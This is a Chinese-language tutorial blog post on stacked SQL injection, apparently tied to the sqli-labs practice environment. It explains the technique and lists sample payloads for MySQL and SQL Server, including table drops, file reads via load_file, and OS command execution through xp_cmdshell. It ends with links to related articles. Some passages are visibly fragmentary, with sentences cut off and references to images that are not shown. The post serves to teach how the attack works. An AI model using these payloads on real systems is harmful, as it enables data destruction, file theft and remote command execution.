sqli-labs ————Stacked 注入攻擊介紹
Stacked injections:堆疊注入。從名詞的含義就可以看到應該是一堆sql語句(多條)一起執行。而在真實的運用中也是這樣的,我們知道在mysql中,主要是命令列中,每一條語句結尾加 ; 表示語句結束。這樣我們就想到了是不是可以多句一起使用。這個叫做stacked injection。
0x01 原理介紹
在SQL中,分號(;)是用來表示一條sql語句的結束。試想一下我們在 ; 結束一個sql語句後繼續構造下一條語句,會不會一起執行?因此這個想法也就造就了堆疊注入。而union injection(聯合注入)也是將兩條語句合併在一起,兩者之間有什麼區別麼?區別就在於union 或者union all執行的語句型別是有限的,可以用來執行查詢語句,而堆疊注入可以執行的是任意的語句。
例如以下這個例子。
資訊,第二條則將整個表進行刪除。
0x02 堆疊注入的侷限性
堆疊注入的侷限性在於並不是每一個環境下都可以執行,可能受到API或者資料庫引擎不支援的限制,當然了許可權不足也可以解釋為什麼攻擊者無法修改資料或者呼叫一些程式。
Ps:此圖是從原文中擷取過來的,因為我個人的測試環境是php+mysql,是可以執行的,此處對於mysql/php存在質疑。但個人估計原文作者可能與我的版本的不同的原因。
雖然我們前面提到了堆疊查詢可以執行任意的sql語句,但是這種注入方式並不是十分的完美的。在我們的web系統中,因為程式碼通常只返回一個查詢結果,因此,堆疊注入第二個語句產生錯誤或者結果只能被忽略,我們在前端介面是無法看到返回結果的。
因此,在讀取資料時,我們建議使用union(聯合)注入。同時在使用堆疊注入之前,我們也是需要知道一些資料庫相關資訊的,例如表名,列名等資訊。
0x03 各個資料庫例項介紹
本節我們從常用資料庫角度出發,介紹幾個型別的資料庫的相關用法。資料庫的基本操作,增刪查改。以下列出資料庫相關堆疊注入的基本操作。
Mysql資料庫
(1)新建一個表 select * from users where id=1;create table test like users;
執行成功,我們再去看一下是否新建成功表。
刪除上面新建的test表select * from users where id=1;drop table test;
查詢資料select * from users where id=1;select 1,2,3;
載入檔案 select * from users where id=1;select load_file('c:/tmpupbbn.php');
values('100','new','new');
Sql server資料庫
增加資料表select * from test;create table sc3(ss CHAR(8));
(3)查詢資料select 1,2,3;select * from test;
修改資料select * from test;update test set name='test' where id=3;
select * from test where id=1;exec master..xp_cmdshell 'ipconfig'
Oracle資料庫
上面的介紹中我們已經提及,oracle不能使用堆疊注入,可以從圖中看到,當有兩條語句在同一行時,直接報錯。無效字元。後面的就不往下繼續嘗試了。
可以看到user_data表已經建好。
刪除上面新建的user_data表select * from user_test;delete from user_data;
查詢資料select * from user_test;select 1,2,3;
修改資料 select * from user_test;update user_test set name='modify' where name='張三';
相關文章
- SQL隱碼攻擊 - 手工注入sqli-labsSQL
- sqli-labs————Less-50(order by stacked injection)SQL
- Mongodb注入攻擊MongoDB
- XSS跨站指令碼攻擊介紹指令碼
- DDoS攻擊最常見的分類介紹!
- 伺服器為什麼經常被攻擊?DDoS攻擊和防禦介紹伺服器
- React 防注入攻擊 XSS攻擊 (放心大膽的用吧)React
- SQL隱碼攻擊-堆疊注入SQL
- PHP 連線方式介紹以及如何攻擊 PHP-FPMPHP
- ARP協議介紹與ARP協議的攻擊手法協議
- 攻擊JavaWeb應用——3、sql注入(上)JavaWebSQL
- 以太坊智慧合約call注入攻擊
- katoto站點被注入指令碼攻擊指令碼
- 網路安全中最常見的DNS攻擊型別介紹!DNS型別
- 常見網路安全威脅及攻擊型別介紹!型別
- SQL隱碼攻擊:sqli-labs lesson-1 小白詳解SQL
- SQL隱碼攻擊中二階注入原理SQL
- 最新堆疊查詢注入攻擊和注入程式碼分析技術
- OSX 攻擊框架Empyre簡介框架
- puppeteer介紹(一)爬蟲,效能,注入爬蟲
- SQL隱碼攻擊原理——萬能密碼注入SQL密碼
- 服務端模板注入攻擊 (SSTI) 之淺析服務端
- 危險係數排名前5的注入攻擊
- SQL隱碼攻擊的檢測方式有幾種?常用方法介紹!SQL
- SQL隱碼攻擊之字元型和數字型注入SQL字元
- SQL隱碼攻擊之常見注入的步驟④SQL
- 哪個報表工具能抵擋 SQL 注入攻擊SQL
- PHP phar:協議物件注入技術介紹PHP協議物件
- 最新二次注入攻擊和程式碼分析技術
- 最新寬位元組注入攻擊和程式碼分析技術
- 最新Base64注入攻擊和程式碼分析技術
- 滲透測試網站sql注入攻擊與防護網站SQL
- SAP Spartacus 中的依賴注入 Dependency Injection 介紹依賴注入
- 封神臺 SQL隱碼攻擊 靶場 (貓舍)手動注入SQL
- SQL隱碼攻擊之二次,加解密,DNS等注入SQL解密DNS
- DDoS攻擊、CC攻擊的攻擊方式和防禦方法
- sqli-Labs————less-46(order by 之後的注入)SQL
- PHP獲取IP地址的方法,防止偽造IP地址注入攻擊PHP